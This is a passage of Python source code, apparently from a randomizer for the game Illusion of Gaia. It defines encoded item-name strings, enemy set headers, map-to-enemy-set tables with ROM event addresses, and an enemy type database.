3: b"\xd3\xd6\x1d\x48\x8d\x82\x80\xac\x63\xa4\x80\xa4\xa5\x84\xac\x40\x4f\xac\xac",
4: b"\xd3\xd6\x1d\x48\x8d\x82\x80\xac\x63\xa4\x80\xa4\xa5\x84\xac\x41\x4f\xac\xac",
5: "",
6: b"\xd3\xd6\x1d\x80\x8d\xac\x87\x84\xa2\x81\x4f\xac\xac\xac\xac\xac\xac\xac\xac",
7: b"\xd3\x64\x87\x84\xac\x43\x88\x80\x8c\x8e\x8d\x83\xac\x41\x8b\x8e\x82\x8a\x4f",
8: b"\xd3\xd6\x1d\xa4\x87\x84\xac\x67\x88\x8d\x83\xac\x4c\x84\x8b\x8e\x83\xa9\x4f",
9: b"\xd3\xd6\x1d\x4b\x8e\x8b\x80\x0e\xa3\xac\x4c\x84\x8b\x8e\x83\xa9\x4f\xac\xac",
10: b"\xd3\xd6\x1d\xa4\x87\x84\xac\x4b\x80\xa2\x86\x84\xac\x62\x8e\x80\xa3\xa4\x4f",
11: b"\xd3\xd6\x1d\x4c\x88\x8d\x84\xac\x4a\x84\xa9\xac\x40\x4f\xac\xac\xac\xac\xac",
12: b"\xd3\xd6\x1d\x4c\x88\x8d\x84\xac\x4a\x84\xa9\xac\x41\x4f\xac\xac\xac\xac\xac",
13: b"\xd3\x64\x87\x84\xac\x4c\x84\x8c\x8e\xa2\xa9\xac\x4c\x84\x8b\x8e\x83\xa9\x4f",
14: b"\xd3\xd6\x1d\x80\xac\x42\xa2\xa9\xa3\xa4\x80\x8b\xac\x41\x80\x8b\x8b\x4f\xac",
15: b"\xd3\x64\x87\x84\xac\x44\x8b\x84\xa6\x80\xa4\x8e\xa2\xac\x4a\x84\xa9\x4f\xac",
16: b"\xd3\x64\x87\x84\xac\x4c\xa5\xac\x60\x80\x8b\x80\x82\x84\xac\x4a\x84\xa9\x4f",
17: b"\xd3\x64\x87\x84\xac\x60\xa5\xa2\x88\xa4\xa9\xac\x63\xa4\x8e\x8d\x84\x4f\xac",
18: b"\xd3\x40\xac\x63\xa4\x80\xa4\xa5\x84\xac\x8e\x85\xac\x47\x8e\xa0\x84\x4f\xac",
19: b"\xd3\xd6\x1d\x80\xac\x62\x80\x8c\x80\xac\x63\xa4\x80\xa4\xa5\x84\x4f\xac\xac",
20: b"\xd3\xd6\x1d\xa4\x87\x84\xac\x4c\x80\x86\x88\x82\xac\x43\xa5\xa3\xa4\x4f\xac",
21: "",
22: b"\xd3\xd6\x1d\x4b\x80\x8d\x82\x84\x0e\xa3\xac\x4b\x84\xa4\xa4\x84\xa2\x4f\xac",
23: b"\xd3\xd6\x1d\xa4\x87\x84\xac\x4d\x84\x82\x8a\x8b\x80\x82\x84\x4f\xac\xac\xac",
24: b"\xd3\xd6\x1d\xa4\x87\x84\xac\x67\x88\x8b\x8b\x4f\xac\xac\xac\xac\xac\xac\xac",
25: b"\xd3\xd6\x1d\xa4\x87\x84\xac\x64\x84\x80\xa0\x8e\xa4\x4f\xac\xac\xac\xac\xac",
26: b"\xd3\xd6\x1d\x4c\xa5\xa3\x87\xa2\x8e\x8e\x8c\xac\x43\xa2\x8e\xa0\xa3\x4f\xac",
27: "",
28: b"\xd3\x64\x87\x84\xac\x41\x8b\x80\x82\x8a\xac\x46\x8b\x80\xa3\xa3\x84\xa3\x4f",
29: b"\xd3\x64\x87\x84\xac\x46\x8e\xa2\x86\x8e\x8d\xac\x45\x8b\x8e\xa7\x84\xa2\x4f",
30: b"\xd3\x40\xac\x47\x88\x84\xa2\x8e\x86\x8b\xa9\xa0\x87\xac\x64\x88\x8b\x84\x4f",
31: b"\xd3\x40\xac\x47\x88\x84\xa2\x8e\x86\x8b\xa9\xa0\x87\xac\x64\x88\x8b\x84\x4f",
32: b"\xd3\x40\xac\x47\x88\x84\xa2\x8e\x86\x8b\xa9\xa0\x87\xac\x64\x88\x8b\x84\x4f",
33: b"\xd3\x40\xac\x47\x88\x84\xa2\x8e\x86\x8b\xa9\xa0\x87\xac\x64\x88\x8b\x84\x4f",
34: b"\xd3\x40\xac\x47\x88\x84\xa2\x8e\x86\x8b\xa9\xa0\x87\xac\x64\x88\x8b\x84\x4f",
35: b"\xd3\x40\xac\x47\x88\x84\xa2\x8e\x86\x8b\xa9\xa0\x87\xac\x64\x88\x8b\x84\x4f",
36: b"\xd3\xd6\x1d\xa4\x87\x84\xac\x40\xa5\xa2\x80\x4f\xac\xac\xac\xac\xac\xac\xac",
37: b"\xd3\xd6\x1d\x4b\x8e\x8b\x80\x0e\xa3\xac\x4b\x84\xa4\xa4\x84\xa2\x4f\xac\xac",
38: b"\xd3\xd6\x1d\x45\x80\xa4\x87\x84\xa2\x0e\xa3\xac\x49\x8e\xa5\xa2\x8d\x80\x8b",
39: b"\xd3\x64\x87\x84\xac\x42\xa2\xa9\xa3\xa4\x80\x8b\xac\x62\x88\x8d\x86\x4f\xac",
40: b"\xd3\xd6\x1d\x80\x8d\xac\x40\xa0\xa0\x8b\x84\x4f\xac\xac\xac\xac\xac\xac\xac",
41: b"\xd3\xd6\x1d\x22\xac\x62\x84\x83\xac\x49\x84\xa7\x84\x8b\xa3\x4f\xac\xac\xac",
42: b"\xd3\xd6\x1d\x23\xac\x62\x84\x83\xac\x49\x84\xa7\x84\x8b\xa3\x4f\xac\xac\xac",
50: b"\xd3\xd6\x1d\x80\x8d\xac\x47\x60\xac\xa5\xa0\x86\xa2\x80\x83\x84\x4f\xac\xac",
51: b"\xd3\xd6\x1d\x80\xac\x43\x44\x45\xac\xa5\xa0\x86\xa2\x80\x83\x84\x4f\xac\xac",
52: b"\xd3\xd6\x1d\x80\xac\x63\x64\x62\xac\xa5\xa0\x86\xa2\x80\x83\x84\x4f\xac\xac",
53: b"\xd3\xd6\x3c\x43\x80\xa3\x87\xac\x88\xa3\xac\x88\x8c\xa0\xa2\x8e\xa6\x84\x83",
54: b"\xd3\x45\xa2\x88\x80\xa2\xac\x88\xa3\xac\x88\x8c\xa0\xa2\x8e\xa6\x84\x83\x4f",
55: b"\xd3\xd6\x1d\x80\xac\x47\x84\x80\xa2\xa4\xac\x60\x88\x84\x82\x84\x4f\xac\xac"
}
# Define short item text for in-game format
# Currently only used in Jeweler's inventory
self.item_text_short = {
0: b"\x4d\x8e\xa4\x87\x88\x8d\x86\xac\xac\xac\xac\xac\xac",
1: b"\x62\x84\x83\xac\x49\x84\xa7\x84\x8b\xac\xac\xac\xac",
2: b"\x60\xa2\x88\xa3\x8e\x8d\xac\x4a\x84\xa9\xac\xac\xac",
3: b"\x48\x8d\x82\x80\xac\x63\xa4\x80\xa4\xa5\x84\xac\x40",
4: b"\x48\x8d\x82\x80\xac\x63\xa4\x80\xa4\xa5\x84\xac\x41",
5: "",
6: b"\x47\x84\xa2\x81\xac\xac\xac\xac\xac\xac\xac\xac\xac",
7: b"\x43\x88\x80\x8c\x8e\x8d\x83\xac\x41\x8b\x8e\x82\x8a",
8: b"\x67\x88\x8d\x83\xac\x4c\x84\x8b\x8e\x83\xa9\xac\xac",
9: b"\x4b\x8e\x8b\x80\x0e\xa3\xac\x4c\x84\x8b\x8e\x83\xa9",
10: b"\x4b\x80\xa2\x86\x84\xac\x62\x8e\x80\xa3\xa4\xac\xac",
11: b"\x4c\x88\x8d\x84\xac\x4a\x84\xa9\xac\x40\xac\xac\xac",
12: b"\x4c\x88\x8d\x84\xac\x4a\x84\xa9\xac\x41\xac\xac\xac",
13: b"\x4c\x84\x8c\x8e\xa2\xa9\xac\x4c\x84\x8b\x8e\x83\xa9",
14: b"\x42\xa2\xa9\xa3\xa4\x80\x8b\xac\x41\x80\x8b\x8b\xac",
15: b"\x44\x8b\x84\xa6\x80\xa4\x8e\xa2\xac\x4a\x84\xa9\xac",
16: b"\x4c\xa5\xac\x60\x80\x8b\x80\x82\x84\xac\x4a\x84\xa9",
17: b"\x60\xa5\xa2\x88\xa4\xa9\xac\x63\xa4\x8e\x8d\x84\xac",
18: b"\x47\x8e\xa0\x84\xac\x63\xa4\x80\xa4\xa5\x84\xac\xac",
19: b"\x62\x80\x8c\x80\xac\x63\xa4\x80\xa4\xa5\x84\xac\xac",
20: b"\x4c\x80\x86\x88\x82\xac\x43\xa5\xa3\xa4\xac\xac\xac",
21: "",
22: b"\x4b\x80\x8d\x82\x84\xac\x4b\x84\xa4\xa4\x84\xa2\xac",
23: b"\x4d\x84\x82\x8a\x8b\x80\x82\x84\xac\xac\xac\xac\xac",
24: b"\x67\x88\x8b\x8b\xac\xac\xac\xac\xac\xac\xac\xac\xac",
25: b"\x64\x84\x80\xa0\x8e\xa4\xac\xac\xac\xac\xac\xac\xac",
26: b"\x63\x87\xa2\x8e\x8e\x8c\xac\x43\xa2\x8e\xa0\xa3\xac",
27: "",
28: b"\x41\x8b\x80\x82\x8a\xac\x46\x8b\x80\xa3\xa3\x84\xa3",
29: b"\x46\x8e\xa2\x86\x8e\x8d\xac\x45\x8b\x8e\xa7\x84\xa2",
30: b"\x47\x88\x84\xa2\x8e\x86\x8b\xa9\xa0\x87\xac\xac\xac",
31: b"\x47\x88\x84\xa2\x8e\x86\x8b\xa9\xa0\x87\xac\xac\xac",
32: b"\x47\x88\x84\xa2\x8e\x86\x8b\xa9\xa0\x87\xac\xac\xac",
33: b"\x47\x88\x84\xa2\x8e\x86\x8b\xa9\xa0\x87\xac\xac\xac",
34: b"\x47\x88\x84\xa2\x8e\x86\x8b\xa9\xa0\x87\xac\xac\xac",
35: b"\x47\x88\x84\xa2\x8e\x86\x8b\xa9\xa0\x87\xac\xac\xac",
36: b"\x40\xa5\xa2\x80\xac\xac\xac\xac\xac\xac\xac\xac\xac",
37: b"\x4b\x8e\x8b\x80\x0e\xa3\xac\x4b\x84\xa4\xa4\x84\xa2",
38: b"\x49\x8e\xa5\xa2\x8d\x80\x8b\xac\xac\xac\xac\xac\xac",
39: b"\x42\xa2\xa9\xa3\xa4\x80\x8b\xac\x62\x88\x8d\x86\xac",
40: b"\x40\xa0\xa0\x8b\x84\xac\xac\xac\xac\xac\xac\xac\xac",
41: b"\x22\xac\x62\x84\x83\xac\x49\x84\xa7\x84\x8b\xa3\xac",
42: b"\x23\xac\x62\x84\x83\xac\x49\x84\xa7\x84\x8b\xa3\xac",
50: b"\x47\x60\xac\x65\xa0\x86\xa2\x80\x83\x84\xac\xac\xac",
51: b"\x43\x44\x45\xac\x65\xa0\x86\xa2\x80\x83\x84\xac\xac",
52: b"\x63\x64\x62\xac\x65\xa0\x86\xa2\x80\x83\x84\xac\xac",
53: b"\x43\x80\xa3\x87\xac\x65\xa0\x86\xa2\x80\x83\x84\xac",
54: b"\x45\xa2\x88\x80\xa2\xac\x65\xa0\x86\xa2\x80\x83\x84",
55: b"\x47\x84\x80\xa2\xa4\xac\x60\x88\x84\x82\x84\xac\xac",
61: b"\xd6\x3c\x43\x80\xa3\x87",
62: b"\xd6\x3c\x63\x8b\x88\x83\x84\xa2",
63: b"\xd7\x31\x43\x80\xa3\x87",
64: b"\xd6\x0c\x45\xa2\x88\x80\xa2",
65: b"\xd6\x03\x41\x80\xa2\xa2\x88\x84\xa2",
66: b"\x44\x80\xa2\xa4\x87\xa1\xa5\x80\x8a\x84\xa2"
}
# Database of enemy groups and spritesets
# FORMAT: { ID: [ROM_Loction, HeaderCode, HeaderData, Name]}
self.enemysets = {
0: [b"\x03\x00\x10\x10\xEC\x59\xCD\x01\x04\x00\x60\xA0\x8C\x75\xDE\x10\xD0\x21\x00\x47\xED\x9F", "Underground Tunnel"],
1: [b"\x03\x00\x10\x10\xBC\x33\xC2\x01\x04\x00\x60\xA0\x0C\x77\xDE\x10\x2A\x0F\x00\xE6\x08\xD5", "Inca Ruins (Mud Monster and Larva)"],
2: [b"\x03\x00\x10\x10\x23\x4D\xC2\x01\x04\x00\x60\xA0\xCC\x77\xDE\x10\x36\x23\x00\x24\x45\xCC", "Inca Ruins (Statues)"],
3: [b"\x03\x00\x10\x10\x16\x5C\xCC\x01\x04\x00\x60\xA0\xCC\x7A\xDE\x10\x30\x29\x00\xBE\x2F\xCB", "Diamond Mine"],
4: [b"\x03\x00\x10\x10\x62\x3D\xCF\x01\x04\x00\x60\xA0\x4C\x7C\xDE\x10\x54\x1D\x00\xEF\xEE\x9E", "Sky Garden (top)"],
5: [b"\x03\x00\x10\x10\x62\x3D\xCF\x01\x04\x00\x60\xA0\x0C\x7D\xDE\x10\x54\x1D\x00\xEF\xEE\x9E", "Sky Garden (bottom)"],
6: [b"\x03\x00\x10\x10\x2D\x2E\xCC\x01\x04\x00\x60\xA0\x00\x00\xDF\x10\x16\x1C\x00\x41\x36\xD1", "Mu"],
7: [b"\x03\x00\x10\x10\xD1\x14\xCF\x01\x04\x00\x60\xA0\x40\x02\xDF\x10\x7F\x0F\x00\x2C\x2B\xD5", "Angel Dungeon"],
8: [b"\x03\x00\x10\x10\x6D\x13\xD0\x01\x04\x00\x60\xA0\x40\x05\xDF\x10\xFF\x16\x00\xF7\xF3\x99", "Great Wall"],
9: [b"\x03\x00\x10\x10\x00\x00\xD0\x01\x04\x00\x60\xA0\x40\x08\xDF\x10\x70\x0E\x00\x5C\x4D\xD8", "Mt. Kress"],
10: [b"\x03\x00\x10\x10\xEA\x15\xCE\x01\x04\x00\x70\x90\x53\x55\xDE\x10\xD5\x14\x00\x08\x73\xCC", "Ankor Wat (outside)"],
11: [b"\x03\x00\x10\x10\x81\x6A\xC1\x01\x04\x00\x70\x90\x13\x57\xDE\x10\x57\x10\x00\x5F\x39\xD4", "Ankor Wat (inside)"],
12: [b"\x03\x00\x10\x10\x0d\x18\xcb\x01\x04\x00\x60\x90\x80\x0a\xdf\x10\xfb\x13\x00\x0e\x67\xd1", "Pyramid"],
13: [b"\x03\x00\x10\x10\x16\x5C\xCC\x01\x04\x00\x60\xA0\xC0\x0C\xDF\x10\x30\x29\x00\xBE\x2F\xCB", "Jeweler's Mansion"]
}
# Enemy map database
# FORMAT: { ID: [EnemySet, RewardBoss(0 for no reward), Reward[type, tier], SearchHeader,
# SpritesetOffset,EventAddrLow,EventAddrHigh,RestrictedEnemysets]}
# ROM address for room reward table is mapID + $1aade
self.maps = {
# For now, no one can have enemyset 10 (Ankor Wat outside)
# Underground Tunnel
12: [0, 1, [0,0], b"\x0C\x00\x02\x05\x03", 4, "c867a", "c86ac", []],
13: [0, 1, [0,0], b"\x0D\x00\x02\x03\x03", 4, "c86ac", "c875c", [0, 1, 2, 3, 4, 5, 7, 8, 9, 11, 12, 13]],
14: [0, 1, [0,0], b"\x0E\x00\x02\x03\x03", 4, "c875c", "c8847", [0, 1, 2, 3, 4, 5, 7, 8, 9, 11, 12, 13]], # Weird 4way issues
15: [0, 1, [0,0], b"\x0F\x00\x02\x03\x03", 4, "c8847", "c8935", [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13]],
18: [0, 1, [0,0], b"\x12\x00\x02\x03\x03", 4, "c8986", "c8aa9", [0, 1, 2, 3, 4, 5, 7, 8, 9, 11, 12, 13]], # Spike balls
# Inca Ruins
27: [1, 0, [0,0], b"\x1B\x00\x02\x05\x03", 4, "c8c33", "c8c87", [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13]], # Moon Tribe cave
29: [1, 1, [0,0], b"\x1D\x00\x02\x0F\x03", 4, "c8cc4", "c8d85", [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13]],
32: [1, 1, [0,0], b"\x20\x00\x02\x08\x03", 4, "c8e16", "c8e75", []], # Broken statue
33: [2, 1, [0,0], b"\x21\x00\x02\x08\x03", 4, "c8e75", "c8f57", [0, 1, 2, 3, 4, 5, 7, 8, 9, 11, 12, 13]], # Floor switch
34: [2, 1, [0,0], b"\x22\x00\x02\x08\x03", 4, "c8f57", "c9029", []], # Floor switch
35: [2, 1, [0,0], b"\x23\x00\x02\x0A\x03", 4, "c9029", "c90d5", [0, 1, 2, 3, 4, 5, 7, 8, 9, 11, 12, 13]],
37: [1, 1, [0,0], b"\x25\x00\x02\x08\x03", 4, "c90f3", "c91a0", [1]], # Diamond block
38: [1, 1, [0,0], b"\x26\x00\x02\x08\x03", 4, "c91a0", "c9242", []], # Broken statues
39: [1, 1, [0,0], b"\x27\x00\x02\x0A\x03", 4, "c9242", "c92f2", []],
40: [1, 1, [0,0], b"\x28\x00\x02\x08\x03", 4, "c92f2", "c935f", [1]], # Falling blocks
# Diamond Mine
61: [3, 2, [0,0], b"\x3D\x00\x02\x08\x03", 4, "c9836", "c98b7", [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13]],
62: [3, 2, [0,0], b"\x3E\x00\x02\x08\x03", 4, "c98b7", "c991a", []],
63: [3, 2, [0,0], b"\x3F\x00\x02\x05\x03", 4, "c991a", "c9a41", []],
64: [3, 2, [0,0], b"\x40\x00\x02\x08\x03", 4, "c9a41", "c9a95", [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13]], # Trapped laborer (??)
65: [3, 2, [0,0], b"\x41\x00\x02\x00\x03", 4, "c9a95", "c9b39", [0, 2, 3, 4, 5, 11]], # Stationary Grundit
69: [3, 2, [0,0], b"\x45\x00\x02\x08\x03", 4, "c9ba1", "c9bf4", []],
70: [3, 2, [0,0], b"\x46\x00\x02\x08\x03", 4, "c9bf4", "c9c5c", [3, 13]],
# Sky Garden
77: [4, 2, [0,0], b"\x4D\x00\x02\x12\x03", 4, "c9db3", "c9e92", []],
78: [5, 2, [0,0], b"\x4E\x00\x02\x10\x03", 4, "c9e92", "c9f53", []],
79: [4, 2, [0,0], b"\x4F\x00\x02\x12\x03", 4, "c9f53", "ca01a", [4, 5]],
80: [5, 2, [0,0], b"\x50\x00\x02\x10\x03", 4, "ca01a", "ca0cb", [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13]],
81: [4, 2, [0,0], b"\x51\x00\x02\x12\x03", 4, "ca0cb", "ca192", [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13]],
82: [5, 2, [0,0], b"\x52\x00\x02\x10\x03", 4, "ca192", "ca247", [4, 5]],
83: [4, 2, [0,0], b"\x53\x00\x02\x12\x03", 4, "ca247", "ca335", [4, 5]],
84: [5, 2, [0,0], b"\x54\x00\x02\x12\x03", 4, "ca335", "ca43b", [4, 5]],
# Mu
# 92: [6,0,0,b"\x5C\x00\x02\x15\x03",4,[]], # Seaside Palace
95: [6, 3, [0,0], b"\x5F\x00\x02\x14\x03", 4, "ca71b", "ca7ed", [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13]],
96: [6, 3, [0,0], b"\x60\x00\x02\x14\x03", 4, "ca7ed", "ca934", [6]],
97: [6, 3, [0,0], b"\x61\x00\x02\x14\x03", 4, "ca934", "caa7b", [6]],
98: [6, 3, [0,0], b"\x62\x00\x02\x14\x03", 4, "caa7b", "cab28", []],
100: [6, 3, [0,0], b"\x64\x00\x02\x14\x03", 4, "cab4b", "cabd4", []],
101: [6, 3, [0,0], b"\x65\x00\x02\x14\x03", 4, "cabd4", "cacc3", [6]],
# Angel Dungeon
109: [7, 3, [0,0], b"\x6D\x00\x02\x16\x03", 4, "caf6e", "cb04b", [7, 8, 9, 10]], # Add 10's back in once flies are fixed
110: [7, 3, [0,0], b"\x6E\x00\x02\x18\x03", 4, "cb04b", "cb13e", [7, 8, 9, 10]],
111: [7, 3, [0,0], b"\x6F\x00\x02\x1B\x03", 4, "cb13e", "cb1ae", [7, 8, 9, 10]],
112: [7, 3, [0,0], b"\x70\x00\x02\x16\x03", 4, "cb1ae", "cb258", [7, 8, 9, 10]],
113: [7, 3, [0,0], b"\x71\x00\x02\x18\x03", 4, "cb258", "cb29e", [7, 8, 9, 10]],
114: [7, 3, [0,0], b"\x72\x00\x02\x18\x03", 4, "cb29e", "cb355", [7, 8, 9, 10]],
# Great Wall
130: [8, 4, [0,0], b"\x82\x00\x02\x1D\x03", 4, "cb6c1", "cb845", [8, 9, 10]], # Add 10's back in once flies are fixed
131: [8, 4, [0,0], b"\x83\x00\x02\x1D\x03", 4, "cb845", "cb966", [7, 8, 9, 10]],
133: [8, 4, [0,0], b"\x85\x00\x02\x1D\x03", 4, "cb97d", "cbb18", [8, 9, 10]],
134: [8, 4, [0,0], b"\x86\x00\x02\x1D\x03", 4, "cbb18", "cbb87", [7, 8, 9, 10]],
135: [8, 4, [0,0], b"\x87\x00\x02\x1D\x03", 4, "cbb87", "cbc3b", [8]],
136: [8, 4, [0,0], b"\x88\x00\x02\x1D\x03", 4, "cbc3b", "cbd0a", [7, 8, 9]],
# Mt Temple
160: [9, 4, [0,0], b"\xA0\x00\x02\x20\x03", 4, "cc18c", "cc21c", []],
161: [9, 4, [0,0], b"\xA1\x00\x02\x20\x03", 4, "cc21c", "cc335", [7, 8, 9, 10]],
162: [9, 4, [0,0], b"\xA2\x00\x02\x20\x03", 4, "cc335", "cc3df", [0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 12, 13]], # Drops
163: [9, 4, [0,0], b"\xA3\x00\x02\x20\x03", 4, "cc3df", "cc4f7", []],
164: [9, 4, [0,0], b"\xA4\x00\x02\x20\x03", 4, "cc4f7", "cc5f8", [0, 1, 2, 3, 4, 5, 8, 9, 10, 11, 12, 13]],
165: [9, 4, [0,0], b"\xA5\x00\x02\x20\x03", 4, "cc5f8", "cc703", [0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 12, 13]], # Drops
166: [9, 4, [0,0], b"\xA6\x00\x02\x20\x03", 4, "cc703", "cc7a1", []],
167: [9, 4, [0,0], b"\xA7\x00\x02\x20\x03", 4, "cc7a1", "cc9a3", [0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 12, 13]],
168: [9, 4, [0,0], b"\xA8\x00\x02\x20\x03", 4, "cc9a3", "cca02", [7, 8, 9, 10]],
# Ankor Wat
176: [10, 6, [0,0], b"\xB0\x00\x02\x2C\x03", 4, "ccb1b", "ccbd8", []],
177: [11, 6, [0,0], b"\xB1\x00\x02\x08\x03", 4, "ccbd8", "ccca5", [0, 1, 2, 3, 4, 5, 7, 8, 9, 11, 12, 13]],
178: [11, 6, [0,0], b"\xB2\x00\x02\x08\x03", 4, "ccca5", "ccd26", [0, 1, 2, 3, 4, 5, 7, 8, 9, 11, 13]],
179: [11, 6, [0,0], b"\xB3\x00\x02\x08\x03", 4, "ccd26", "ccd83", []],
180: [11, 6, [0,0], b"\xB4\x00\x02\x08\x03", 4, "ccd83", "ccdd7", [0, 1, 2, 3, 4, 5, 7, 8, 9, 11, 13]],
181: [11, 6, [0,0], b"\xB5\x00\x02\x08\x03", 4, "ccdd7", "cce7b", []],
182: [10, 6, [0,0], b"\xB6\x00\x02\x2C\x03", 4, "cce7b", "cd005", [0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 12, 13]],
183: [11, 6, [0,0], b"\xB7\x00\x02\x08\x03", 4, "cd005", "cd092", []], # Earthquaker Golem
184: [11, 6, [0,0], b"\xB8\x00\x02\x08\x03", 4, "cd092", "cd0df", [0, 1, 3, 4, 5, 7, 8, 9, 11, 13]],
185: [11, 6, [0,0], b"\xB9\x00\x02\x08\x03", 4, "cd0df", "cd137", []],
186: [10, 6, [0,0], b"\xBA\x00\x02\x2C\x03", 4, "cd137", "cd197", []],
187: [11, 6, [0,0], b"\xBB\x00\x02\x08\x03", 4, "cd197", "cd1f4", []],
188: [11, 6, [0,0], b"\xBC\x00\x02\x24\x03", 4, "cd1f4", "cd29a", []],
189: [11, 6, [0,0], b"\xBD\x00\x02\x08\x03", 4, "cd29a", "cd339", []],
190: [11, 6, [0,0], b"\xBE\x00\x02\x08\x03", 4, "cd339", "cd392", []],
# Pyramid
204: [12, 5, [0,0], b"\xCC\x00\x02\x08\x03", 4, "cd539", "cd58c", []],
206: [12, 5, [0,0], b"\xCE\x00\x02\x08\x03", 4, "cd5c6", "cd650", []],
207: [12, 5, [0,0], b"\xCF\x00\x02\x08\x03", 4, "cd650", "cd6f3", []],
208: [12, 5, [0,0], b"\xD0\x00\x02\x08\x03", 4, "cd6f3", "cd752", []],
209: [12, 5, [0,0], b"\xD1\x00\x02\x08\x03", 4, "cd752", "cd81b", []],
210: [12, 5, [0,0], b"\xD2\x00\x02\x08\x03", 4, "cd81b", "cd8f1", []],
211: [12, 5, [0,0], b"\xD3\x00\x02\x08\x03", 4, "cd8f1", "cd9a1", []],
212: [12, 5, [0,0], b"\xD4\x00\x02\x08\x03", 4, "cd9a1", "cda80", []],
213: [12, 5, [0,0], b"\xD5\x00\x02\x08\x03", 4, "cda80", "cdb4b", []],
214: [12, 5, [0,0], b"\xD6\x00\x02\x26\x03", 4, "cdb4b", "cdc1e", []],
215: [12, 5, [0,0], b"\xD7\x00\x02\x28\x03", 4, "cdc1e", "cdcfd", [0, 2, 3, 4, 5, 6, 8, 9, 11, 12, 13]],
216: [12, 5, [0,0], b"\xD8\x00\x02\x08\x03", 4, "cdcfd", "cde4f", [0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 12, 13]],
217: [12, 5, [0,0], b"\xD9\x00\x02\x26\x03", 4, "cde4f", "cdf3c", []],
219: [12, 5, [0,0], b"\xDB\x00\x02\x26\x03", 4, "cdf76", "ce010", [0, 4, 5, 8, 9, 11, 12]], #Spike elevators
# Jeweler's Mansion
233: [13, 0, [0,0], b"\xE9\x00\x02\x22\x03", 4, "ce224", "ce3a6", [0, 1, 2, 3, 4, 5, 6, 8, 9, 11, 12, 13]]
}
# Database of enemy types
# FORMAT: { ID: [Enemyset, Event addr, VanillaTemplate,
# Type(1=stationary,2=walking,3=flying),OnWalkableTile,CanBeRandom,Name]}
self.enemies = {
# Underground Tunnel
0: [0, b"\x55\x87\x8a", b"\x05", 2, True, True, "Bat"], # a8755
1: [0, b"\x6c\x82\x8a", b"\x01", 2, True, True, "Ribber"],
2: [0, b"\x00\x80\x8a", b"\x02", 1, False, True, "Canal Worm"],
3: [0, b"\xf7\x85\x8a", b"\x03", 2, True, False, "King Bat"],
4: [0, b"\x76\x84\x8a", b"\x10", 2, True, True, "Skull Chaser"],
5: [0, b"\xff\x86\x8a", b"\x04", 2, True, False, "Bat Minion 1"],
6: [0, b"\x9a\x86\x8a", b"\x04", 2, True, False, "Bat Minion 2"],
7: [0, b"\x69\x86\x8a", b"\x04", 2, True, False, "Bat Minion 3"],
8: [0, b"\xcb\x86\x8a", b"\x04", 2, True, False, "Bat Minion 4"],
# Inca Ruins
10: [1, b"\xb7\x8d\x8a", b"\x0b", 2, True, True, "Slugger"],
11: [1, b"\xb6\x8e\x8a", b"\x0b", 2, True, False, "Scuttlebug"],
12: [1, b"\x1b\x8b\x8a", b"\x0a", 2, True, True, "Mudpit"],
13: [1, b"\x70\x8c\x8a", b"\x0c", 1, True, True, "Four Way"],
14: [2, b"\xee\x97\x8a", b"\x0f", 2, True, True, "Splop"],
15: [2, b"\xbc\x98\x8a", b"\x0e", 3, False, True, "Whirligig"],
16: [2, b"\xc2\x95\x8a", b"\x0d", 2, True, False, "Stone Lord R"], # shoots fire
17: [2, b"\xb3\x95\x8a", b"\x0d", 2, True, True, "Stone Lord D"], # shoots fire
18: [2, b"\xb8\x95\x8a", b"\x0d", 2, True, False, "Stone Lord U"], # shoots fire
19: [2, b"\xbd\x95\x8a", b"\x0d", 2, True, False, "Stone Lord L"], # shoots fire
20: [2, b"\x70\x90\x8a", b"\x0d", 2, True, False, "Stone Guard R"], # throws spears
21: [2, b"\x6b\x90\x8a", b"\x0d", 2, True, False, "Stone Guard L"], # throws spears
22: [2, b"\x61\x90\x8a", b"\x0d", 2, True, True, "Stone Guard D"], # throws spears
23: [2, b"\xc3\x99\x8a", b"\x0e", 1, False, False, "Whirligig (stationary)"],
# Diamond Mine
30: [3, b"\xca\xaa\x8a", b"\x18", 2, True, True, "Flayzer 1"],
31: [3, b"\x54\xaa\x8a", b"\x18", 2, True, False, "Flayzer 2"],
32: [3, b"\x8a\xaa\x8a", b"\x18", 2, True, False, "Flayzer 3"],
33: [3, b"\x03\xb1\x8a", b"\x19", 2, True, True, "Eye Stalker"],
34: [3, b"\xb3\xb0\x8a", b"\x19", 2, True, False, "Eye Stalker (stone)"],
35: [3, b"\xf5\xaf\x8a", b"\x1a", 1, True, True, "Grundit"],
# 36: [3,b"\xf5\xa4\x8a",b"\x1a","Grundit (stationary)"], # Can't randomize this guy
# Sky Garden
40: [4, b"\xb0\xb4\x8a", b"\x1d", 2, True, True, "Blue Cyber"],
41: [4, b"\x20\xc5\x8a", b"\x1b", 2, True, True, "Dynapede 1"],
42: [4, b"\x33\xc5\x8a", b"\x1b", 2, True, False, "Dynapede 2"],
43: [5, b"\xb0\xb8\x8a", b"\x1e", 2, True, True, "Red Cyber"],
44: [5, b"\x16\xc8\x8a", b"\x1c", 2, True, True, "Nitropede"],
# Mu
50: [6, b"\xcc\xe6\x8a", b"\x2b", 2, True, True, "Slipper"],
51: [6, b"\x5c\xe4\x8a", b"\x2a", 2, True, True, "Skuddle"],
52: [6, b"\x9e\xdd\x8a", b"\x28", 2, True, True, "Cyclops"],
53: [6, b"\x6e\xe2\x8a", b"\x29", 3, True, True, "Flasher"],
54: [6, b"\x07\xde\x8a", b"\x28", 2, True, False, "Cyclops (asleep)"],
55: [6, b"\xf4\xe6\x8a", b"\x2b", 2, True, True, "Slipper (falling)"],
# Angel Dungeon
60: [7, b"\x9f\xee\x8a", b"\x2d", 3, False, True, "Dive Bat"],
61: [7, b"\x51\xea\x8a", b"\x2c", 2, True, True, "Steelbones"],
62: [7, b"\x33\xef\x8a", b"\x2e", 1, True, True, "Draco"], # False for now...
63: [7, b"\xc7\xf0\x8a", b"\x2e", 1, True, True, "Ramskull"],
# Great Wall
